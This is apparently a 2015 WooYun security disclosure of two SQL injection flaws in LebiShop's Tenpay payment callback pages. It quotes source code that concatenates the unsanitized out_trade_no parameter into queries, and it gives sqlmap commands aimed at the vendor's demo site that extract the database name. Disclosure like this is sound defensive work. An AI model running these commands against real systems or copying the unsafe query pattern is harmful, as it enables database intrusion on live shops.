当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099181

漏洞标题:LebiShop系统sql注入三(两处注入)

相关厂商:www.lebi.cn

漏洞作者: hello

提交时间:2015-03-05 11:14

修复时间:2015-06-08 11:17

公开时间:2015-06-08 11:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

LebiShop商城系统最新版SQL注入二 四处 官方demo演示

详细说明:

注入一

http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx


源码如下

protected void Page_Load(object sender, EventArgs e)
{
    string where = base.Request["out_trade_no"]; //没处理
    Lebi_Order model = B_Lebi_Order.GetModel(where); //跟进
    if (model == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else
    {
        TenpayUtil util = new TenpayUtil(model);
        ResponseHandler handler = new ResponseHandler(this.Context);
        ....
public Lebi_Order_Log GetModel(string strWhere)
{
    if (strWhere.IndexOf("lbsql{") > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }
    StringBuilder builder = new StringBuilder();
    builder.Append("select  top 1  * from [Lebi_Order_Log] ");
    builder.Append(" where " + strWhere); //strWhere 没处理存在注入
    Lebi_Order_Log log = new Lebi_Order_Log();
    DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
    if (set.Tables[0].Rows.Count <= 0)
    {
        return null;
    }
    if (set.Tables[0].Rows[0]["id"].ToString() != "")
    {
        log.id = int.Parse(set.Tables[0].Rows[0]["id"].ToString());
    }
    if (set.Tables[0].Rows[0]["Order_id"].ToString() != "")
    {
        log.Order_id = int.Parse(set.Tables[0].Rows[0]["Order_id"].ToString());
    }
    if (set.Tables[0].Rows[0]["User_id"].ToString() != "")
    {
        log.User_id = int.Parse(set.Tables[0].Rows[0]["User_id"].ToString());
    }
    if (set.Tables[0].Rows[0]["Admin_id"].ToString() != "")
    {
        log.Admin_id = int.Parse(set.Tables[0].Rows[0]["Admin_id"].ToString());
    }
    log.Admin_Name = set.Tables[0].Rows[0]["Admin_Name"].ToString();
    log.Content = set.Tables[0].Rows[0]["Content"].ToString();
    if (set.Tables[0].Rows[0]["Time_Add"].ToString() != "")
    {
        log.Time_Add = DateTime.Parse(set.Tables[0].Rows[0]["Time_Add"].ToString());
    }
    return log;
}


注入二

http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx


protected void Page_Load(object sender, EventArgs e)
{
    string where = base.Request["out_trade_no"]; //没处理
    Lebi_Order model = B_Lebi_Order.GetModel(where);//跟进
    if (model == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    else
    {
        TenpayUtil util = new TenpayUtil(model);
        ResponseHandler handler = new ResponseHandler(this.Context);
        handler.setKey(util.tenpay_key);
        if (handler.isTenpaySign())


public Lebi_Order GetModel(string strWhere)
{
    if (strWhere.IndexOf("lbsql{") > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }
    StringBuilder builder = new StringBuilder();
    builder.Append("select  top 1  * from [Lebi_Order] ");
    builder.Append(" where " + strWhere); //存在注入了
    Lebi_Order order = new Lebi_Order();
    DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
    if (set.Tables[0].Rows.Count <= 0)

漏洞证明:

注入一
sqlmap扫描

sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10


555.png


556.png


第二处注入
sqlmap扫描

sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10


557.png


558.png

修复方案:

对参数进行处理

版权声明:转载请注明来源 hello@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-08 11:17

厂商回复:

最新状态:

暂无